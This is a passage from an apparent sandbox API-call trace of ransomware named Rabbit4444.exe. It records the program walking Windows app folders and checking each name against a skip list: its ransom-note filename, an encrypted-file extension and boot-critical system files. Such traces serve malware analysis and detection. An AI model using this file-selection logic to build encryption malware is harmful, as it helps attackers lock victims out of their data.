cFileName="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", cAlternateFileName="MICROS~1.HOL")) returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2=".") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="..") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.870] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy") returned="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy" [0055.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11ce40 [0055.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x11dab8 [0055.870] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11ce48 | out: ListHead=0xf68b0, ListEntry=0x11ce48) returned 0x11cde8 [0055.870] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7544fabf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.MOD")) returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2=".") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="..") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.870] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy") returned="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy" [0055.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d0e0 [0055.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x11db78 [0055.870] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d0e8 | out: ListHead=0xf68b0, ListEntry=0x11d0e8) returned 0x11ce48 [0055.870] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b8500e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", cAlternateFileName="MICROS~2.OOB")) returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.870] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2=".") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="..") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.871] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy") returned="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy" [0055.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cf40 [0055.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x11dc38 [0055.871] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cf48 | out: ListHead=0xf68b0, ListEntry=0x11cf48) returned 0x11d0e8 [0055.871] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74116aed, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", cAlternateFileName="MICROS~1.OOB")) returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2=".") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="..") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.871] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy") returned="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy" [0055.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cd40 [0055.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x115f70 [0055.871] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cd48 | out: ListHead=0xf68b0, ListEntry=0x11cd48) returned 0x11cf48 [0055.871] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x734de9c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x73a62109, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", cAlternateFileName="MICROS~1.PAR")) returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2=".") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="..") returned 1 [0055.871] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.872] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.ParentalControls_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.ParentalControls_cw5n1h2txyewy") returned="Microsoft.Windows.ParentalControls_cw5n1h2txyewy" [0055.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cfc0 [0055.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x11dd00 [0055.872] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cfc8 | out: ListHead=0xf68b0, ListEntry=0x11cfc8) returned 0x11cd48 [0055.872] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xec8930d8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xecaaa968, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.Photos_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.PHO")) returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.872] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.Photos_8wekyb3d8bbwe" | out: lpString1="Microsoft.Windows.Photos_8wekyb3d8bbwe") returned="Microsoft.Windows.Photos_8wekyb3d8bbwe" [0055.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cfe0 [0055.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9c) returned 0x11ddb8 [0055.872] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cfe8 | out: ListHead=0xf68b0, ListEntry=0x11cfe8) returned 0x11cfc8 [0055.872] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x726dcc78, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", cAlternateFileName="MICROS~3.SEC")) returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2=".") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="..") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.872] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.873] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy") returned="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy" [0055.873] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cd60 [0055.873] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x119158 [0055.873] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cd68 | out: ListHead=0xf68b0, ListEntry=0x11cd68) returned 0x11cfe8 [0055.873] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8333af6e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x70e206ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x70e206ba, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", cAlternateFileName="MICROS~1.SEC")) returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2=".") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="..") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.873] lstrcmpiW (lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.873] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy") returned="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy" [0055.873] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d100 [0055.873] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11de60 [0055.873] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d108 | out: ListHead=0xf68b0, ListEntry=0x11d108) returned 0x11cd68 [0055.873] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702a7000, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x702a7000, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", cAlternateFileName="MICROS~2.SEC")) returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2=".") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="..") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.874] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy") returned="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy" [0055.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cda0 [0055.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11df28 [0055.874] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cda8 | out: ListHead=0xf68b0, ListEntry=0x11cda8) returned 0x11d108 [0055.874] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd6e44f49, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd6e44f49, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.SHE")) returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2=".") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="..") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.874] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.875] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy") returned="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy" [0055.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d000 [0055.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x11dff0 [0055.875] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d008 | out: ListHead=0xf68b0, ListEntry=0x11d008) returned 0x11cda8 [0055.875] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71ce0e7e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", cAlternateFileName="MI948A~1.WIN")) returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2=".") returned 1 [0055.875] lstrcmpiW 